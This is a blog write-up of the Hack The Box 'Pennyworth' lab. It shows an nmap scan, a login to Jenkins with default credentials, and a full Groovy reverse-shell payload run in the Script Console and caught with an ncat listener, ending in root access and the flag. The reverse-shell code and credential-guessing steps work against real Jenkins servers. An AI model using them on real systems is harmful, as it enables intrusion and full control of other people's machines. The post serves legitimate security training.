The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Pennyworth: Remote command execution vulnerability

posted on 3.6.2023 by Below Surface in "Hack The Box"

Port scan first, exchange ip with your machines IP address.

sudo nmap -sV ip

Relevant output:

PORT     STATE SERVICE VERSION
8080/tcp open  http    Jetty 9.4.39.v20210325

Let's paste the IP address with port 8080 into our browser:

http://ip:8080

Since Jenkins is running on this system, we search for default credentials on Google. Working credentials are

Username: root
Password: password

After researching if there are any known CVE's for this version of Jenkins, we know that there are none. Though we also found a GitHub repository (link below) for Jenkins pentesting. We will try to run Groovy script code in the Jenkins Script Console. On the website, navigate to "Manage Jenkins" and then scroll down to "Script Console". Our goal is to receive a reverse shell connection from the target server. For this we need to exploit a remote command execution vulnerability first. And our attack surface for this is the Groovy Script Console.

From the below linked GitHub repository (swisskyrepo) we get the following payload, where we just need to insert the IP address of our local attack machine. Get your IP by:

ifconfig tun0

It is the inet one. Insert it into this script (first line):

String host="ip";
int port=443;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

But before we paste and run this in the Script Console, we need to fire up Ncat on port 8000 on our local machine:

ncat -lvnp 443

Expected output:

Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Now, run code from above in the Script Console and watch the Ncat console window.

Output:

Ncat: Connection from 10.129.142.187.
Ncat: Connection from 10.129.142.187:39832.

Running the command within the Netcat window:

whoami

Outputs

root

So we run this two commands to output the flag!

cd /root
cat flag.txt

Tags:

hack the box
jenkins
java
remote code execution
default credentials
ncat

Sources:

https://app.hackthebox.com/starting-pointhttps://github.com/gquere/pwn_jenkinshttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Tactics: Get the flag via Samba Client or psexec.py

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box